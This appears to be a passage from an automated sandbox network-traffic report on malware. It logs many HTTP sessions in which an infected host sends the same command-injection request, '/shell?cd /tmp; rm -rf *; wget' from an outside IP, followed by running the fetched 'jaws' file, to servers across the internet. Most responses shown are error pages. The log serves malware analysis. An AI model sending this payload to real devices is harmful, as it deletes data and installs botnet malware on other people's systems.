                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;1e3c1202&#46;1704173116&#46;32d7efb1</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          511192.168.2.2353296190.77.152.21680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:16.037353992 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          512192.168.2.2348722104.71.83.3280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:16.196516991 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:16.524490118 CET430INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 208
                                                          Expires: Tue, 02 Jan 2024 05:25:16 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:16 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 37 61 39 33 30 31 37 26 23 34 36 3b 31 37 30 34 31 37 33 31 31 36 26 23 34 36 3b 31 37 36 36 65 64 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;37a93017&#46;1704173116&#46;1766ed9</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          513192.168.2.233517254.219.136.3780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:18.698983908 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          514192.168.2.234836287.106.240.16380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:18.777401924 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:19.021136999 CET441INHTTP/1.1 404 Not Found
                                                          Date: Tue, 02 Jan 2024 05:25:01 GMT
                                                          Server: Apache/2.4.12 (Win32) PHP/5.6.5
                                                          Content-Length: 203
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          515192.168.2.2334070114.33.8.1880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:18.822763920 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:19.114801884 CET338INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Tue, 02 Jan 2024 05:25:18 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          516192.168.2.233999651.178.25.2680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:19.073342085 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:19.320478916 CET504INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:25:19 GMT
                                                          Server: Apache/2.4.38 (Debian)
                                                          Content-Length: 310
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 64 65 62 69 61 6e 2e 65 78 61 6d 70 6c 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.38 (Debian) Server at debian.example.com Port 80</address></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          517192.168.2.2352970164.132.227.17180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:19.078205109 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          518192.168.2.2359120186.39.8.7380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:19.095834017 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:19.369797945 CET424INData Raw: 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 2f 6a 61 77 73 3b 73 68 2b 2f 74 6d 70 2f 6a 61 77 73 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6d 69 63 72 6f 5f 68 74 74 70 64 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 30
                                                          Data Ascii: 157.90.250.90/jaws;sh+/tmp/jaws 400 Bad RequestServer: micro_httpdDate: Tue, 02 Jan 2024 05:25:19 GMTConnection: keep-aliveKeep-Alive: timeout=60, max=1000Content-Type: text/htmlContent-Security-Policy: default-src 'self'; frame-an


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          519192.168.2.2352468185.114.245.25180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:19.107883930 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:19.392081022 CET336INHTTP/1.1 400 Bad Request
                                                          Server: nginx/1.24.0
                                                          Date: Tue, 02 Jan 2024 05:25:19 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Content-Length: 157
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          520192.168.2.2360062197.26.86.8580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:19.114867926 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          521192.168.2.2340728156.234.219.23480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:19.115031004 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:19.406645060 CET399INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:25:19 GMT
                                                          Server:
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          522192.168.2.2348996121.4.183.14480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:19.173099041 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:19.492388010 CET306INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:25:19 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          523192.168.2.235869468.233.96.13280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:19.392966986 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:19.762799025 CET322INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:25:19 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          524192.168.2.234311035.242.176.1480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:21.012628078 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          525192.168.2.235357035.187.108.16980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:21.019391060 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:21.254209042 CET336INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.14.2
                                                          Date: Tue, 02 Jan 2024 05:25:21 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 169
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.2</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          526192.168.2.235157090.79.11.6080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:21.019509077 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:21.257440090 CET499INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:25:21 GMT
                                                          Server: Apache/2.4.56 (Raspbian)
                                                          Content-Length: 303
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 52 61 73 70 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Raspbian) Server at 127.0.1.1 Port 80</address></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          527192.168.2.2357904188.166.210.13980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:21.187951088 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:21.594156027 CET338INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Tue, 02 Jan 2024 05:25:21 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          528192.168.2.2351318172.98.133.4680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:21.231178045 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:21.449568987 CET242INHTTP/1.0 400 Bad Request
                                                          Connection: close
                                                          Content-Length: 113
                                                          Date: Tue, 02 Jan 2024 05:25:16 GMT
                                                          Expires: 0
                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><head><title>Error 400: Bad Request</title></head><body><h1>Error 400: Bad Request</h1></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          529192.168.2.233593452.29.37.5880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:21.265685081 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:21.513478994 CET292INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:25:21 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          530192.168.2.2339796141.219.107.12280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:21.445297956 CET6OUTData Raw: 47 45 54
                                                          Data Ascii: GET


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          531192.168.2.2355884103.131.18.24380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:21.511351109 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:21.834887981 CET514INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:25:21 GMT
                                                          Server: Apache/2.4.25 (Debian)
                                                          Content-Length: 320
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
